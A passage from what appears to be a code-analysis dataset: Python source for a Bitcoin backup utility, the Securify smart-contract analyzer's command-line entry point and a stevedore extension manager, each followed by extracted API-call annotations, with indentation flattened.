error = f'Unable to write to the data dir in {data_dir} as {whoami()}.'
log(error)
except FileNotFoundError:
ok = False
error = f'"{data_dir}" directory does not exist.'
log(error)
return ok, error
def format_time(unformatted_time):
'''
Format time so seconds, milliseconds, and timezone are stripped.
>>> format_time('2009-01-12 12:00:00.000000+00:00')
'2009-01-12 12:00'
'''
i = unformatted_time.find('.')
if i > 0:
unformatted_time = unformatted_time[:i]
i = unformatted_time.rfind(':')
if i > 0:
unformatted_time = unformatted_time[:i]
return unformatted_time
def wait_period(formatted_time):
'''
Format the period to wait into readable hours and minutes.
>>> last_backed_up_time = state.get_last_backed_up_time()
>>> hours_til_next_backup = format_time(str(now() - last_backed_up_time))
>>> time_period = wait_period(hours_til_next_backup)
>>> time_period is not None
True
'''
def format_hours_section(hours, extra_hours):
''' Format the hours. '''
hours_section = None
if hours is not None and hours:
hours = int(hours) + extra_hours
if hours > 1:
if extra_hours > 0:
hours_section = f'>{hours} hours'
else:
hours_section = f'{hours} hours'
elif hours == 1:
hours_section = f'{hours} hour'
return hours_section
def format_minutes_section(minutes):
''' Format the minutes. '''
minutes_section = None
if minutes is not None and minutes:
if int(minutes) > 1:
minutes_section = f'{minutes} minutes'
elif int(minutes) == 1:
minutes_section = f'{minutes} minute'
return minutes_section
i = formatted_time.rfind(',')
if i > 0:
extra_hours = 24
formatted_time = formatted_time[i+1:].strip()
else:
extra_hours = 0
i = formatted_time.find(':')
if i >= 0:
hours = formatted_time[:i]
minutes = formatted_time[i+1:]
else:
hours = None
minutes = None
hours_section = format_hours_section(hours, extra_hours)
minutes_section = format_minutes_section(minutes)
if hours_section is None and minutes_section is None:
time_period = 'less than a minute'
elif hours_section is None:
time_period = minutes_section
elif minutes_section is None:
time_period = hours_section
else:
time_period = f'{hours_section} and {minutes_section}'
return time_period
def get_next_backup_time():
'''
Get the next time we need to backup.
>>> from blockchain_backup.bitcoin.tests import utils as test_utils
>>> test_utils.init_database()
>>> next_backup_time = get_next_backup_time()
>>> next_backup_time is not None
True
'''
from blockchain_backup.bitcoin.preferences import get_backup_schedule
last_backed_up_time = state.get_last_backed_up_time()
bkup_schedule = get_backup_schedule()
next_backup_time = last_backed_up_time + timedelta(hours=bkup_schedule)
return next_backup_time
def get_next_backup_in():
'''
Get the hours/minutes until next backup.
>>> from blockchain_backup.bitcoin.tests import utils as test_utils
>>> test_utils.init_database()
>>> next_backup_in = get_next_backup_in()
>>> next_backup_in is not None
True
'''
next_backup_time = get_next_backup_time()
seconds = (next_backup_time - now()).total_seconds()
status = seconds_human_readable(seconds)
return status
def need_to_backup(data_dir, current_block):
'''
Check the time stamp of the last backup
and whether updates are needed.
Don't backup too often, make sure enough time
has passed to make it worth the resources.
>>> from denova.python.log import get_log_path
>>> from blockchain_backup.bitcoin.tests import utils as test_utils
>>> test_utils.init_database()
>>> log_name = os.path.basename(get_log_path())
>>> data_dir = '/tmp/bitcoin/data'
>>> os.chdir(data_dir)
>>> last_block_updated = state.get_last_block_updated()
>>> state.set_last_block_updated(551292)
>>> current_block = 551301
>>> need_to_backup(data_dir, current_block)
False
>>> state.set_last_block_updated(0)
>>> current_block = 551301
>>> need_to_backup(data_dir, current_block)
False
>>> current_block = 0
>>> need_to_backup(data_dir, current_block)
False
>>> state.set_last_block_updated(last_block_updated)
'''
try:
message = None
current_time = now()
next_backup_time = get_next_backup_time()
need_backup = next_backup_time < current_time
if need_backup:
start_access_time = state.get_start_access_time()
last_access_time = state.get_last_access_time()
last_backed_up_time = state.get_last_backed_up_time()
# don't bother backing up if Blockchain Backup hasn't started
# either bitcoind or bitcoin-qt
if start_access_time < last_access_time:
if last_access_time < last_backed_up_time:
need_backup = False
state.set_last_backed_up_time(now())
log('set last backed up time to now because no access since last backup')
if need_backup:
# if there's no data yet, than there's no need for a backup
# 5 items is picked as a quick test
if len(os.listdir(data_dir)) <= 5:
need_backup = False
log('no data so no need to back up')
else:
last_block_updated = state.get_last_block_updated()
if current_block < 0 and last_block_updated == 0:
pass # yes, we need to backup; I find this test easier than alternatives
elif current_block > 0:
if last_block_updated == 0 or current_block > last_block_updated:
state.set_last_block_updated(current_block)
else:
need_backup = False
message = 'The blockchain was not backed up because no new blocks were received.'
log(message)
check_for_updates(current_time=current_time)
except: # 'bare except' because it catches more than "except Exception"
# backup if anything in our analysis goes wrong
need_backup = True
log(format_exc())
return need_backup
def delete_last_updated_files(dirname):
'''
Delete all the "last-updated" files from the directory.
Return the number of files deleted.
>>> dirname = '/tmp/bitcoin/data/testnet3'
>>> delete_last_updated_files(dirname)
0
'''
files_deleted = 0
# remove all files that suggest this backup is complete
entries = os.scandir(dirname)
for entry in entries:
if entry.is_file() and entry.name.startswith(constants.LAST_UPDATED_PREFIX):
os.remove(entry.path)
files_deleted += 1
return files_deleted
def get_most_recent_confirmation(last_block_time):
'''
Get and format the most recent
confirmation of the blockchain.
>>> from blockchain_backup.bitcoin.tests import utils as test_utils
>>> test_utils.init_database()
>>> get_most_recent_confirmation(now())
'Up to date'
'''
seconds = (now() - last_block_time).total_seconds()
time_behind = seconds_human_readable(seconds)
if time_behind is None or time_behind == '0 seconds':
time_behind = 'Up to date'
return time_behind
def check_for_updates(current_time=None, force=False, reason=None):
'''
Check to see if updates are needed.
>>> from blockchain_backup.bitcoin.tests import utils as test_utils
>>> test_utils.init_database()
>>> check_for_updates()
True
'''
updates_checked = False
try:
if current_time is None:
current_time = now()
next_updates_time = state.get_last_update_time() + timedelta(hours=24)
if force or next_updates_time <= current_time:
log('starting to check for the latest updates')
# set the update time now so we don't restart the check too often
state.set_last_update_time(current_time)
command_args = []
command_args.append('python3')
# get the path for check_for_updates.py, regardless of virtualenv, etc.
check_program = os.path.realpath(os.path.abspath(os.path.join(
os.path.dirname(blockchain_backup_file), 'config', 'check_for_updates.py')))
command_args.append(check_program)
if reason is not None:
command_args.append(reason)
background(*command_args)
updates_checked = True
except: # 'bare except' because it catches more than "except Exception"
log(format_exc())
return updates_checked
def get_path_of_core_apps():
'''
Get the path of the bitcoin core apps.
>>> bin_dir = get_path_of_core_apps()
>>> len(bin_dir) > 0
True
'''
bin_dir = None
entries = os.get_exec_path()
for entry in entries:
if (os.path.exists(os.path.join(entry, bitcoind())) and
os.path.exists(os.path.join(entry, bitcoin_cli())) and
os.path.exists(os.path.join(entry, bitcoind()))):
bin_dir = entry
break
return bin_dir
def get_ok_button():
'''
Get a button.
>>> get_ok_button()
' <a href="/" name="ok-button" id="ok-id" class="btn btn-secondary" title="Click to return to front page." role="button"> <strong>OK</strong> </a><br/>'
'''
return get_button('/', 'OK', 'Click to return to front page.')
def get_button(href, label, tooltip):
'''
Get a button.
>>> get_button("/", "OK", "It's ok to return to front page")
' <a href="/" name="ok-button" id="ok-id" class="btn btn-secondary" title="It\\'s ok to return to front page" role="button"> <strong>OK</strong> </a><br/>'
'''
base = label.replace(' ', '-').replace(',', '').replace("'", '').lower()
name = f'{base}-button'
id_tag = f'{base}-id'
button_tag = ' <a href="{}" name="{}" id="{}" class="btn btn-secondary" title="{}" role="button"> <strong>{}</strong> </a><br/>'.format(
href, name, id_tag, tooltip, label)
return button_tag
| [
"denova.python.times.seconds_human_readable",
"denova.os.command.run",
"blockchain_backup.bitcoin.state.get_last_access_time",
"denova.os.command.background",
"blockchain_backup.bitcoin.state.set_last_block_updated",
"os.get_exec_path",
"datetime.timedelta",
"denova.os.osid.is_windows",
"os.remove",... | [((761, 770), 'denova.python.log.get_log', 'get_log', ([], {}), '()\n', (768, 770), False, 'from denova.python.log import get_log\n'), ((926, 938), 'denova.os.osid.is_windows', 'is_windows', ([], {}), '()\n', (936, 938), False, 'from denova.os.osid import is_windows\n'), ((1145, 1157), 'denova.os.osid.is_windows', 'is_windows', ([], {}), '()\n', (1155, 1157), False, 'from denova.os.osid import is_windows\n'), ((1349, 1361), 'denova.os.osid.is_windows', 'is_windows', ([], {}), '()\n', (1359, 1361), False, 'from denova.os.osid import is_windows\n'), ((1563, 1575), 'denova.os.osid.is_windows', 'is_windows', ([], {}), '()\n', (1573, 1575), False, 'from denova.os.osid import is_windows\n'), ((2650, 2694), 'denova.os.process.is_program_running', 'is_program_running', (['constants.BACKUP_PROGRAM'], {}), '(constants.BACKUP_PROGRAM)\n', (2668, 2694), False, 'from denova.os.process import get_path, is_program_running\n'), ((2885, 2930), 'denova.os.process.is_program_running', 'is_program_running', (['constants.RESTORE_PROGRAM'], {}), '(constants.RESTORE_PROGRAM)\n', (2903, 2930), False, 'from denova.os.process import get_path, is_program_running\n'), ((7120, 7134), 'blockchain_backup.bitcoin.preferences.get_data_dir', 'get_data_dir', ([], {}), '()\n', (7132, 7134), False, 'from blockchain_backup.bitcoin.preferences import get_data_dir, get_extra_args\n'), ((7152, 7168), 'blockchain_backup.bitcoin.preferences.get_backup_dir', 'get_backup_dir', ([], {}), '()\n', (7166, 7168), False, 'from blockchain_backup.bitcoin.preferences import get_backup_dir, get_data_dir\n'), ((8056, 8086), 'os.path.exists', 'os.path.exists', (['debug_log_name'], {}), '(debug_log_name)\n', (8070, 8086), False, 'import os\n'), ((8567, 8610), 'os.path.join', 'os.path.join', (['data_dir', 'constants.DEBUG_LOG'], {}), '(data_dir, constants.DEBUG_LOG)\n', (8579, 8610), False, 'import os\n'), ((14321, 14352), 'blockchain_backup.bitcoin.state.get_last_backed_up_time', 'state.get_last_backed_up_time', ([], {}), '()\n', (14350, 14352), False, 'from blockchain_backup.bitcoin import constants, state\n'), ((14373, 14394), 'blockchain_backup.bitcoin.preferences.get_backup_schedule', 'get_backup_schedule', ([], {}), '()\n', (14392, 14394), False, 'from blockchain_backup.bitcoin.preferences import get_backup_schedule\n'), ((14926, 14957), 'denova.python.times.seconds_human_readable', 'seconds_human_readable', (['seconds'], {}), '(seconds)\n', (14948, 14957), False, 'from denova.python.times import seconds_human_readable\n'), ((18406, 18425), 'os.scandir', 'os.scandir', (['dirname'], {}), '(dirname)\n', (18416, 18425), False, 'import os\n'), ((19034, 19065), 'denova.python.times.seconds_human_readable', 'seconds_human_readable', (['seconds'], {}), '(seconds)\n', (19056, 19065), False, 'from denova.python.times import seconds_human_readable\n'), ((20775, 20793), 'os.get_exec_path', 'os.get_exec_path', ([], {}), '()\n', (20791, 20793), False, 'import os\n'), ((3422, 3443), 'os.path.dirname', 'os.path.dirname', (['path'], {}), '(path)\n', (3437, 3443), False, 'import os\n'), ((3948, 3961), 'blockchain_backup.bitcoin.preferences.get_bin_dir', 'get_bin_dir', ([], {}), '()\n', (3959, 3961), False, 'from blockchain_backup.bitcoin.preferences import get_bin_dir\n'), ((4175, 4193), 'denova.os.command.run', 'run', (['*command_args'], {}), '(*command_args)\n', (4178, 4193), False, 'from denova.os.command import background, run\n'), ((6127, 6143), 'blockchain_backup.bitcoin.preferences.get_extra_args', 'get_extra_args', ([], {}), '()\n', (6141, 6143), False, 'from blockchain_backup.bitcoin.preferences import get_data_dir, get_extra_args\n'), ((8096, 8121), 'os.remove', 'os.remove', (['debug_log_name'], {}), '(debug_log_name)\n', (8105, 8121), False, 'import os\n'), ((9101, 9115), 'blockchain_backup.bitcoin.preferences.get_data_dir', 'get_data_dir', ([], {}), '()\n', (9113, 9115), False, 'from blockchain_backup.bitcoin.preferences import get_data_dir, get_extra_args\n'), ((9162, 9178), 'blockchain_backup.bitcoin.preferences.get_extra_args', 'get_extra_args', ([], {}), '()\n', (9176, 9178), False, 'from blockchain_backup.bitcoin.preferences import get_data_dir, get_extra_args\n'), ((10942, 10973), 'os.path.join', 'os.path.join', (['data_dir', '""".test"""'], {}), "(data_dir, '.test')\n", (10954, 10973), False, 'import os\n'), ((11070, 11089), 'os.remove', 'os.remove', (['filename'], {}), '(filename)\n', (11079, 11089), False, 'import os\n'), ((14440, 14470), 'datetime.timedelta', 'timedelta', ([], {'hours': 'bkup_schedule'}), '(hours=bkup_schedule)\n', (14449, 14470), False, 'from datetime import timedelta\n'), ((16105, 16110), 'django.utils.timezone.now', 'now', ([], {}), '()\n', (16108, 16110), False, 'from django.utils.timezone import now\n'), ((3373, 3390), 'denova.os.process.get_path', 'get_path', (['program'], {}), '(program)\n', (3381, 3390), False, 'from denova.os.process import get_path, is_program_running\n'), ((9652, 9685), 'json.dumps', 'json.dumps', (["{f'{key}_html': html}"], {}), "({f'{key}_html': html})\n", (9662, 9685), False, 'import json\n'), ((16272, 16301), 'blockchain_backup.bitcoin.state.get_start_access_time', 'state.get_start_access_time', ([], {}), '()\n', (16299, 16301), False, 'from blockchain_backup.bitcoin import constants, state\n'), ((16333, 16361), 'blockchain_backup.bitcoin.state.get_last_access_time', 'state.get_last_access_time', ([], {}), '()\n', (16359, 16361), False, 'from blockchain_backup.bitcoin import constants, state\n'), ((16396, 16427), 'blockchain_backup.bitcoin.state.get_last_backed_up_time', 'state.get_last_backed_up_time', ([], {}), '()\n', (16425, 16427), False, 'from blockchain_backup.bitcoin import constants, state\n'), ((18549, 18570), 'os.remove', 'os.remove', (['entry.path'], {}), '(entry.path)\n', (18558, 18570), False, 'import os\n'), ((19572, 19577), 'django.utils.timezone.now', 'now', ([], {}), '()\n', (19575, 19577), False, 'from django.utils.timezone import now\n'), ((19607, 19635), 'blockchain_backup.bitcoin.state.get_last_update_time', 'state.get_last_update_time', ([], {}), '()\n', (19633, 19635), False, 'from blockchain_backup.bitcoin import constants, state\n'), ((19638, 19657), 'datetime.timedelta', 'timedelta', ([], {'hours': '(24)'}), '(hours=24)\n', (19647, 19657), False, 'from datetime import timedelta\n'), ((19864, 19904), 'blockchain_backup.bitcoin.state.set_last_update_time', 'state.set_last_update_time', (['current_time'], {}), '(current_time)\n', (19890, 19904), False, 'from blockchain_backup.bitcoin import constants, state\n'), ((20367, 20392), 'denova.os.command.background', 'background', (['*command_args'], {}), '(*command_args)\n', (20377, 20392), False, 'from denova.os.command import background, run\n'), ((14890, 14895), 'django.utils.timezone.now', 'now', ([], {}), '()\n', (14893, 14895), False, 'from django.utils.timezone import now\n'), ((17186, 17216), 'blockchain_backup.bitcoin.state.get_last_block_updated', 'state.get_last_block_updated', ([], {}), '()\n', (17214, 17216), False, 'from blockchain_backup.bitcoin import constants, state\n'), ((17996, 18008), 'traceback.format_exc', 'format_exc', ([], {}), '()\n', (18006, 18008), False, 'from traceback import format_exc\n'), ((18975, 18980), 'django.utils.timezone.now', 'now', ([], {}), '()\n', (18978, 18980), False, 'from django.utils.timezone import now\n'), ((20517, 20529), 'traceback.format_exc', 'format_exc', ([], {}), '()\n', (20527, 20529), False, 'from traceback import format_exc\n'), ((11244, 11252), 'denova.os.user.whoami', 'whoami', ([], {}), '()\n', (11250, 11252), False, 'from denova.os.user import whoami\n'), ((17014, 17034), 'os.listdir', 'os.listdir', (['data_dir'], {}), '(data_dir)\n', (17024, 17034), False, 'import os\n'), ((16749, 16754), 'django.utils.timezone.now', 'now', ([], {}), '()\n', (16752, 16754), False, 'from django.utils.timezone import now\n'), ((20152, 20191), 'os.path.dirname', 'os.path.dirname', (['blockchain_backup_file'], {}), '(blockchain_backup_file)\n', (20167, 20191), False, 'import os\n'), ((17526, 17569), 'blockchain_backup.bitcoin.state.set_last_block_updated', 'state.set_last_block_updated', (['current_block'], {}), '(current_block)\n', (17554, 17569), False, 'from blockchain_backup.bitcoin import constants, state\n')] |
import argparse
from pathlib import Path
from securify.analyses.analysis import discover_patterns, AnalysisContext, AnalysisConfiguration, print_pattern_matches, print_pattern_matches_json
from securify.solidity import solidity_ast_compiler, solidity_cfg_compiler
from securify.staticanalysis import static_analysis
from securify.staticanalysis.factencoder import encode
from securify.staticanalysis.visualization import visualize
from securify.utils.ethereum_blockchain import get_contract_from_blockchain
import re
import semantic_version
from securify.solidity.solidity_ast_compiler import compiler_version
import sys
import importlib
def get_list_of_patterns(context=AnalysisContext(), patterns='all', exclude_patterns=[], severity_inc=[], severity_exc=[]):
pattern_classes = discover_patterns()
use_patterns = list(map(lambda p: p(context), pattern_classes))
if patterns != 'all':
# Comply with vulnerability table: add pattern suffix to every pattern name
patterns = list(map(lambda x: x + "Pattern", patterns))
use_patterns = list(filter(lambda p: p.__class__.__name__ in patterns, use_patterns))
extended_exclude_patterns = list(map(lambda x: x + "Pattern", exclude_patterns))
use_patterns = list(filter(lambda p: p.__class__.__name__ not in extended_exclude_patterns, use_patterns))
if severity_inc != []:
use_patterns = list(filter(lambda p: p.severity.name in severity_inc, use_patterns))
if severity_exc != []:
use_patterns = list(filter(lambda p: p.severity.name not in severity_exc, use_patterns))
return use_patterns
class ListPatterns(argparse.Action):
def __call__(self, parser, *args, **kwargs):
patterns = get_list_of_patterns()
for p in patterns:
# Comply with vulnerability table: remove 'Pattern' suffix
print("Name:", p.__class__.__name__.replace('Pattern', ''))
print("Severity:", p.severity.name)
msg = "Description: " + p.description
print(msg)
print(len(msg) * "-")
parser.exit()
def normalize_severity_args(args):
translate = dict(C='CRITICAL', H='HIGH', M='MEDIUM', L='LOW', O='OPTIMIZATION', I='INFO')
if args == 'all':
return translate.values()
if args == 'none':
return []
severities = args.split(',')
severities = [s.strip().upper() for s in severities]
def expand_severity(s):
if len(s) > 1:
return s
else:
return translate[s]
severities = [expand_severity(s) for s in severities]
return severities
def parse_arguments():
parser = argparse.ArgumentParser(
description='securify: A static analyzer for Ethereum contracts.',
usage="securify contract.sol [opts]")
parser.add_argument('contract',
help='A contract to analyze. Can be a file or an address of a contract on blockchain')
parser.add_argument("--ignore-pragma", help="By default securify changes the pragma directives in contracts with pragma \
directives <= 0.5.8. Use this flag to ignore this functionality",
action='store_true')
parser.add_argument("--solidity", help="Define path to solidity binary", default=None)
parser.add_argument("--stack-limit",
help="Set python stack maximum depth. This might be useful since some contracts might exceed this limit.",
type=int,
default=1000)
parser.add_argument("--flatten",
help = "Create a flattened file based on the imports. The analyse will be done on this new file",
action="store_true")
pattern_group = parser.add_argument_group('Patterns')
pattern_group.add_argument("--list-patterns", "-l", help="List the available patterns to check",
nargs=0,
action=ListPatterns)
pattern_group.add_argument("--use-patterns", "-p",
help="Pattern names separated with spaces to include in the analysis, default='all'",
action="store",
nargs='+',
dest='use_patterns', default='all')
pattern_group.add_argument("--exclude-patterns",
help="Pattern names separated with spaces to exclude from the analysis",
action="store",
nargs='+',
dest='exclude_patterns', default=[])
pattern_group.add_argument("--include-severity", "-i",
help="Severity levels to include: \
CRITICAL, HIGH, MEDIUM, LOW, INFO",
action='store',
nargs='+',
dest='include_severity', default=[])
pattern_group.add_argument("--exclude-severity", "-e",
help="Severity levels to exclude: \
CRITICAL, HIGH, MEDIUM, LOW, INFO",
action='store',
nargs='+',
dest='exclude_severity', default=[])
pattern_group.add_argument("--include-contracts", "-c",
help="Contracts to include in the output",
action='store',
nargs='+',
default='all')
pattern_group.add_argument("--exclude-contracts",
help="Contracts to exclude from the output",
action='store',
nargs='+',
default=[])
pattern_group.add_argument("--show-compliants",
help="Show compliant matches. Useful for debugging.",
action='store_true',
default=False)
parser.add_argument('--visualize', '-v', help='Visualize AST', action='store_true')
parser.add_argument('--output-json', '-j', help='Output in JSON format. \
Notice that the rest of the output will be suppressed.', action='store_true')
etherscan_group = parser.add_argument_group('Etherscan API')
etherscan_group.add_argument('--from-blockchain', '-b',
help="The address of a contract in the Ethereum blockchain.",
action='store_true')
etherscan_group.add_argument('--key', '-k', help="The file where the api-key for etherscan.io is stored.",
default='api_key.txt')
compilation_group = parser.add_argument_group('Compilation of Datalog code')
compilation_group.add_argument('--interpreter',
help="Use the souffle interpreter to run the datalog code.\
Particularly useful when experimenting with new patterns.",
action='store_true')
compilation_group.add_argument('--recompile', help="Force recompilation of the datalog code.",
action='store_true')
base_path = Path(__file__).parent
compilation_group.add_argument('--library-dir', help="Directory of the functors' library.",
default=base_path / 'staticanalysis/libfunctors/')
args = parser.parse_args()
return args
def prepare_env(binary=None):
import os
base_path = Path(__file__).parent / 'staticanalysis/libfunctors/'
def check_for_libfunctors():
libfunctors = base_path / 'libfunctors.so'
compile_script = './compile_functors.sh'
if libfunctors.is_file(): return
print("libfunctors.so not compiled. Compiling it now...")
os.system("cd " + base_path.absolute().as_posix() + " && " + compile_script + "&& cd - > /dev/null")
def check_LD_LIBRARY_PATH():
if 'LD_LIBRARY_PATH' in os.environ: return
print("Environment variable LD_LIBRARY_PATH not set. Setting it up...")
os.environ['LD_LIBRARY_PATH'] = base_path.absolute().as_posix()
def define_SOLC_BINARY(binary=None):
if binary is None: return
print("Setting SOLC_BINARY to {}...".format(binary))
os.environ['SOLC_BINARY'] = binary
check_for_libfunctors()
check_LD_LIBRARY_PATH()
define_SOLC_BINARY(binary)
return
# Reads the current contract and creates a new one with the pragma directive fixed
def fix_pragma(contract):
installed_version = compiler_version()
fixed_pragma_file = "/tmp/fixed_pragma.sol"
rpattern = r"pragma solidity \^?(\d*\.\d*\.\d*);?"
with open(contract) as c:
source = c.read()
pattern = re.compile(rpattern)
try :
match = pattern.search(source)
solidity_version = match.group(1)
except:
return contract
installed_version = ".".join([str(installed_version.major), str(installed_version.minor), str(installed_version.patch)])
if semantic_version.Version(solidity_version) >= semantic_version.Version(installed_version):
return contract
print("pragma directive defines a prior version to {v}. Changing pragma version to {v}....".format(v=installed_version))
new_source = re.sub(rpattern, r"pragma solidity {};".format(installed_version), source)
with open(fixed_pragma_file, 'w') as f:
f.write(new_source)
return fixed_pragma_file
def main():
save_stdout = sys.stdout
args = parse_arguments()
# suppress the output when outputting json
if args.output_json:
sys.stdout = open('/tmp/securify_suppressed.out', 'w')
prepare_env(binary=args.solidity)
sys.setrecursionlimit(args.stack_limit)
contract = args.contract
if args.flatten:
my_module = importlib.import_module("securify.utils.flattener", package=".")
contract = my_module.flatten(contract)
if args.from_blockchain:
contract = get_contract_from_blockchain(args.contract, args.key)
if not args.ignore_pragma:
contract = fix_pragma(contract)
souffle_config = dict(use_interpreter=args.interpreter, force_recompilation=args.recompile,
library_dir=args.library_dir)
config = AnalysisConfiguration(
# TODO: this returns only the dict ast, but should return the object representation
ast_compiler=lambda t: solidity_ast_compiler.compile_ast(t.source_file),
cfg_compiler=lambda t: solidity_cfg_compiler.compile_cfg(t.ast).cfg,
static_analysis=lambda t: static_analysis.analyze_cfg(t.cfg, **souffle_config),
)
context = AnalysisContext(
config=config,
source_file=contract
)
if args.visualize:
cfg = context.cfg
facts, _ = encode(cfg)
visualize(facts).render("out/dl", format="svg", cleanup=True)
patterns = get_list_of_patterns(context=context,
patterns=args.use_patterns,
exclude_patterns=args.exclude_patterns,
severity_inc=args.include_severity,
severity_exc=args.exclude_severity)
matches = []
for pattern in patterns:
matches.extend(pattern.find_matches())
skip_compliant = not args.show_compliants
sys.stdout = save_stdout
if args.output_json:
print_pattern_matches_json(context, matches, skip_compliant=skip_compliant,
include_contracts=args.include_contracts,
exclude_contracts=args.exclude_contracts)
else:
print_pattern_matches(context, matches, skip_compliant=skip_compliant,
include_contracts=args.include_contracts,
exclude_contracts=args.exclude_contracts)
if __name__ == '__main__':
main()
| [
"sys.setrecursionlimit",
"securify.analyses.analysis.AnalysisContext",
"securify.solidity.solidity_cfg_compiler.compile_cfg",
"importlib.import_module",
"argparse.ArgumentParser",
"re.compile",
"pathlib.Path",
"securify.solidity.solidity_ast_compiler.compile_ast",
"securify.staticanalysis.visualizat... | [((673, 690), 'securify.analyses.analysis.AnalysisContext', 'AnalysisContext', ([], {}), '()\n', (688, 690), False, 'from securify.analyses.analysis import discover_patterns, AnalysisContext, AnalysisConfiguration, print_pattern_matches, print_pattern_matches_json\n'), ((786, 805), 'securify.analyses.analysis.discover_patterns', 'discover_patterns', ([], {}), '()\n', (803, 805), False, 'from securify.analyses.analysis import discover_patterns, AnalysisContext, AnalysisConfiguration, print_pattern_matches, print_pattern_matches_json\n'), ((2650, 2788), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""securify: A static analyzer for Ethereum contracts."""', 'usage': '"""securify contract.sol [opts]"""'}), "(description=\n 'securify: A static analyzer for Ethereum contracts.', usage=\n 'securify contract.sol [opts]')\n", (2673, 2788), False, 'import argparse\n'), ((8858, 8876), 'securify.solidity.solidity_ast_compiler.compiler_version', 'compiler_version', ([], {}), '()\n', (8874, 8876), False, 'from securify.solidity.solidity_ast_compiler import compiler_version\n'), ((9054, 9074), 're.compile', 're.compile', (['rpattern'], {}), '(rpattern)\n', (9064, 9074), False, 'import re\n'), ((10028, 10067), 'sys.setrecursionlimit', 'sys.setrecursionlimit', (['args.stack_limit'], {}), '(args.stack_limit)\n', (10049, 10067), False, 'import sys\n'), ((10980, 11032), 'securify.analyses.analysis.AnalysisContext', 'AnalysisContext', ([], {'config': 'config', 'source_file': 'contract'}), '(config=config, source_file=contract)\n', (10995, 11032), False, 'from securify.analyses.analysis import discover_patterns, AnalysisContext, AnalysisConfiguration, print_pattern_matches, print_pattern_matches_json\n'), ((7489, 7503), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (7493, 7503), False, 'from pathlib import Path\n'), ((9337, 9379), 'semantic_version.Version', 'semantic_version.Version', (['solidity_version'], {}), '(solidity_version)\n', (9361, 9379), False, 'import semantic_version\n'), ((9383, 9426), 'semantic_version.Version', 'semantic_version.Version', (['installed_version'], {}), '(installed_version)\n', (9407, 9426), False, 'import semantic_version\n'), ((10144, 10208), 'importlib.import_module', 'importlib.import_module', (['"""securify.utils.flattener"""'], {'package': '"""."""'}), "('securify.utils.flattener', package='.')\n", (10167, 10208), False, 'import importlib\n'), ((10305, 10358), 'securify.utils.ethereum_blockchain.get_contract_from_blockchain', 'get_contract_from_blockchain', (['args.contract', 'args.key'], {}), '(args.contract, args.key)\n', (10333, 10358), False, 'from securify.utils.ethereum_blockchain import get_contract_from_blockchain\n'), ((11124, 11135), 'securify.staticanalysis.factencoder.encode', 'encode', (['cfg'], {}), '(cfg)\n', (11130, 11135), False, 'from securify.staticanalysis.factencoder import encode\n'), ((11749, 11917), 'securify.analyses.analysis.print_pattern_matches_json', 'print_pattern_matches_json', (['context', 'matches'], {'skip_compliant': 'skip_compliant', 'include_contracts': 'args.include_contracts', 'exclude_contracts': 'args.exclude_contracts'}), '(context, matches, skip_compliant=skip_compliant,\n include_contracts=args.include_contracts, exclude_contracts=args.\n exclude_contracts)\n', (11775, 11917), False, 'from securify.analyses.analysis import discover_patterns, AnalysisContext, AnalysisConfiguration, print_pattern_matches, print_pattern_matches_json\n'), ((11997, 12160), 'securify.analyses.analysis.print_pattern_matches', 'print_pattern_matches', (['context', 'matches'], {'skip_compliant': 'skip_compliant', 'include_contracts': 'args.include_contracts', 'exclude_contracts': 'args.exclude_contracts'}), '(context, matches, skip_compliant=skip_compliant,\n include_contracts=args.include_contracts, exclude_contracts=args.\n exclude_contracts)\n', (12018, 12160), False, 'from securify.analyses.analysis import discover_patterns, AnalysisContext, AnalysisConfiguration, print_pattern_matches, print_pattern_matches_json\n'), ((7803, 7817), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (7807, 7817), False, 'from pathlib import Path\n'), ((10744, 10792), 'securify.solidity.solidity_ast_compiler.compile_ast', 'solidity_ast_compiler.compile_ast', (['t.source_file'], {}), '(t.source_file)\n', (10777, 10792), False, 'from securify.solidity import solidity_ast_compiler, solidity_cfg_compiler\n'), ((10905, 10957), 'securify.staticanalysis.static_analysis.analyze_cfg', 'static_analysis.analyze_cfg', (['t.cfg'], {}), '(t.cfg, **souffle_config)\n', (10932, 10957), False, 'from securify.staticanalysis import static_analysis\n'), ((11144, 11160), 'securify.staticanalysis.visualization.visualize', 'visualize', (['facts'], {}), '(facts)\n', (11153, 11160), False, 'from securify.staticanalysis.visualization import visualize\n'), ((10825, 10865), 'securify.solidity.solidity_cfg_compiler.compile_cfg', 'solidity_cfg_compiler.compile_cfg', (['t.ast'], {}), '(t.ast)\n', (10858, 10865), False, 'from securify.solidity import solidity_ast_compiler, solidity_cfg_compiler\n')] |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from .extension import ExtensionManager
LOG = logging.getLogger(__name__)
class EnabledExtensionManager(ExtensionManager):
"""Loads only plugins that pass a check function.
The check_func argument should return a boolean, with ``True``
indicating that the extension should be loaded and made available
and ``False`` indicating that the extension should be ignored.
:param namespace: The namespace for the entry points.
:type namespace: str
:param check_func: Function to determine which extensions to load.
:type check_func: callable, taking an :class:`Extension`
instance as argument
:param invoke_on_load: Boolean controlling whether to invoke the
object returned by the entry point after the driver is loaded.
:type invoke_on_load: bool
:param invoke_args: Positional arguments to pass when invoking
the object returned by the entry point. Only used if invoke_on_load
is True.
:type invoke_args: tuple
:param invoke_kwds: Named arguments to pass when invoking
the object returned by the entry point. Only used if invoke_on_load
is True.
:type invoke_kwds: dict
:param propagate_map_exceptions: Boolean controlling whether exceptions
are propagated up through the map call or whether they are logged and
then ignored
:type propagate_map_exceptions: bool
:param on_load_failure_callback: Callback function that will be called when
an entrypoint can not be loaded. The arguments that will be provided
when this is called (when an entrypoint fails to load) are
(manager, entrypoint, exception)
:type on_load_failure_callback: function
:param verify_requirements: Use setuptools to enforce the
dependencies of the plugin(s) being loaded. Defaults to False.
:type verify_requirements: bool
"""
def __init__(self, namespace, check_func, invoke_on_load=False,
invoke_args=(), invoke_kwds={},
propagate_map_exceptions=False,
on_load_failure_callback=None,
verify_requirements=False,):
self.check_func = check_func
super(EnabledExtensionManager, self).__init__(
namespace,
invoke_on_load=invoke_on_load,
invoke_args=invoke_args,
invoke_kwds=invoke_kwds,
